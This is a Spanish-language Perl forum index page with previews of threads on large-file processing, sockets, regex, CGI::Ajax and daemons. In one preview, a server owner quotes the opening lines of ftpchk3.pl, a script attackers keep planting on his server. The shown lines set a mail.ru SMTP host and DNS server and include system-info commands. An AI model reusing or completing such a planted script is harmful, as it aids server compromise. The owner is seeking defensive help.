• Publicidad

Fecha actual 2024-11-23 18:31 @813

News News of Avanzado

Site map of Avanzado » Foro : Avanzado

Así que programas sin strict y las expresiones regulares son otro modo de hablar. Aquí encontrarás respuestas de nivel avanzado, no recomendable para los débiles de corazón.

Rapidez en Perl

Hola Buenos días a todos.
Les escribo por que tengo el siguiente problema:

Tengo que leer un archivo de más de 5 GB con más de 5 millones de líneas. Cada línea es un registro con formato XML y con muchos errores de sintaxis.
Hice un script en Perl para darle el formato adecuado y corregir errores de sintaxis, que funcionó muy bien para un archivo de 50 Mb, pero para 5 GB tardaría muchísimo ...
Read more : Rapidez en Perl | Vistas : 3938 | Respuestas : 13

Socket Perl

hola, ¿qué tal?

Yo ya he hecho un socket, mas o menos anduvo, pero ahora lo que tengo que hacer no es solo enviar un mensaje a otro lado sino que el que lo recibió lo responda, ¿es posible esto? ¿qué tengo que usar?

Gracias.

Saludos.
Read more : Socket Perl | Vistas : 4477 | Respuestas : 8

Ejecutar una URL

Hola a todos.

Necesito mandar a llamar un URL con parámetos, los parámetros se los enviaré en la URL algo así como: http://syz.com/smspp.aspx?numero=777751 ... rte=miguel

Esa URL me devuelve una cadena, de mensaje enviado o mensaje no enviado, yo necesito mandar a ejecutar el llamado a esta URL desde un programa en Perl, hay algún módulo CPAN para hacerlo, en este momento lo hago con lynx pero es muy ...
Read more : Ejecutar una URL | Vistas : 2027 | Respuestas : 2

Sustitución dentro de un fichero con Perl

Hola a todos,
A ver si me podéis echar una mano con esto... (me imagino que para los gurús del Perl les será bastante sencillo).

Tengo un fichero el cual contiene x líneas. Y quiero sustituir por cada línea del fichero el literal ";&;" por este otro "; ;".

Imaginemos que mi fichero se llama prueba.txt. Esto es lo que hago:

my $comando = "cat prueba.txt | ";

sustituye($comando);

sub sustituye{

my $file = shift; ...
Read more : Sustitución dentro de un fichero con Perl | Vistas : 1440 | Respuestas : 1

Hack con Perl

Estimados foreros,

No quiero molestar con esta consulta pero no encuentro forma de bloquear el continuo hackeo a mi servidor.

Cada vez que entran encuentro un archivo en Perl de nombre ftpchk3.pl
y que contiene esto:

#!/usr/bin/perl -w

$| = 1;

my $smtp = 'smtp.mail.ru';
my $dns = '208.67.222.222';

print "Content-type: text/plain; charset=windows-1251\n\n" if $ENV{HTTP_USER_AGENT};

#print "System info\n";
#print "-----------\n\n";
#print "$^O";
#print "\n", `uname -a` if $^O !~ /win/i;
#print "\n\n";

#print "Perl modules\n"; ...
Read more : Hack con Perl | Vistas : 3721 | Respuestas : 4

Duda sobre macheo

Muy buenas,
Desde hace muy poquito me he puesto a aprender y a hacer cositas con Perl y me he encontrado con esta duda que os paso a explicar a continuación (a ver si soy capaz de escribirla)...

- Yo voy leyendo de un directorio una serie de ficheros de log.

- De esos ficheros me interesa coger cierta información por lo que decido hacer el famoso m// (adjunto macheo completo)

if (m/\"\\".+nodeName\=(+).*\&mnn\=(+).+\&msisdn\=(+).*\&HTTP_USER_AGENT\=(+).+JSESSIONID\=+\"\s+\"+\"\s+\"(+)/);

Una vez ...
Read more : Duda sobre macheo | Vistas : 2749 | Respuestas : 4

Ayuda con Socket

Hola a todos ¿Qué tal? Yo soy novato en Perl y por eso les pido que por favor me ayuden, necesito que dos pc se puedan hablar entre sí. Para eso escribí el siguiente código.

Servidor:
#!/usr/bin/perl -w
use strict;
use Socket;

# use port 7890 as default
my $port = shift || 7890;
my $proto = getprotobyname('tcp');

# create a socket, make it reusable
socket(SOCKET, PF_INET, SOCK_STREAM, $proto)
or die "Can't open socket $!\n"; ...
Read more : Ayuda con Socket | Vistas : 2547 | Respuestas : 3

Ajax

Estoy usando CGI::Ajax en una aplicación donde lleno un combo de datos obtenidos de una consulta a Mysql. El problema radica en que los datos que devuelve Ajax para llenar el combo, cuando éstos son palabras acentuadas, por ejemplo, NO las respeta como tales y les anexa caracteres RAROS.

¿Cómo podría hacer para que los datos devueltos sean del mismo formato almacenado en la base de datos?

¡¡¡¡ Muchas gracias !!!!
Read more : Ajax | Vistas : 1813 | Respuestas : 3

Web Service que recibe un xml

Hola a todos,

Tengo que hacer uso de un servicio web que solo recibe un dato; este dato está definido en el WSDL como string y tiene formato xml.

El problema es que a pesar de haber repasado el guión xml a pasar y los datos con la persona que lleva el server siempre me retorna el mismo error.

Este es más o menos el error que me sale con el Data::Dumper y CGI::Carp qw(carpout): ...
Read more : Web Service que recibe un xml | Vistas : 2915 | Respuestas : 2

Duda teórica y puntual de signals en un daemon Perl

Hola, tengo un daemon HTTP hecho en Perl que funciona de 10... pero hay algo que funciona bien y no se por qué :? Se las hago fácil:

Creo un server con my $server = IO::Socket::INET->new(...)

Tengo un bucle para las conexiones while ($client = $server->accept()){...}continue{} que las trata con FORK...

Y luego del bucle coloco el código para cuando se termine (que pensaba controlar con una ...
Read more : Duda teórica y puntual de signals en un daemon Perl | Vistas : 1796 | Respuestas : 2

Identificarte  •  Registrarse

Estadísticas

Mensajes totales 36880 • Temas totales 7428 • Usuarios totales 1981